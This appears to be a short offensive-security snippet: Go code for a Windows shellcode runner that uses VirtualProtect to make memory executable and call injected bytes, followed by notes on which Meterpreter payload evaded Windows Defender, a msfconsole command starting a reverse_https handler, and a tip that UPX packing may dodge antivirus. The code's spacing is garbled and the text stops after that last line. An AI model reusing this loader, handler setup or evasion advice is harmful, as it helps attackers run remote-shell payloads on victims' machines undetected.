packageshellcodeimport ("syscall""unsafe")var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")funcVirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool { ret, _, _ := procVirtualProtect.Call(uintptr(lpAddress),uintptr(dwSize),uintptr(flNewProtect),uintptr(lpflOldProtect))return ret >0}funcRun(sc []byte) {// TODO need a Go safe fork// Make a function ptr f :=func() {}// Change permissions on f function ptrvar oldfperms uint32if!VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {panic("Call to VirtualProtect failed!") }// Override function ptr**(**uintptr)(unsafe.Pointer(&f)) =*(*uintptr)(unsafe.Pointer(&sc))// Change permissions on shellcode string datavar oldshellcodeperms uint32if!VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {panic("Call to VirtualProtect failed!") }// Call the function ptr itf()}
At the time of writing the windows/x64/meterpreter/reverse_tcp payload was flagged by windows defender when executing (behavior analysis) but not the windows/x64/meterpreter/reverse_https
Starting the handler:
msfconsole -x "use exploit/multi/handler;\
set PAYLOAD windows/x64/meterpreter/reverse_https;\
set LHOST localhost;\
set LPORT 8443;\
run -j"
Packing the binary using UPX might help with Antivirus detection: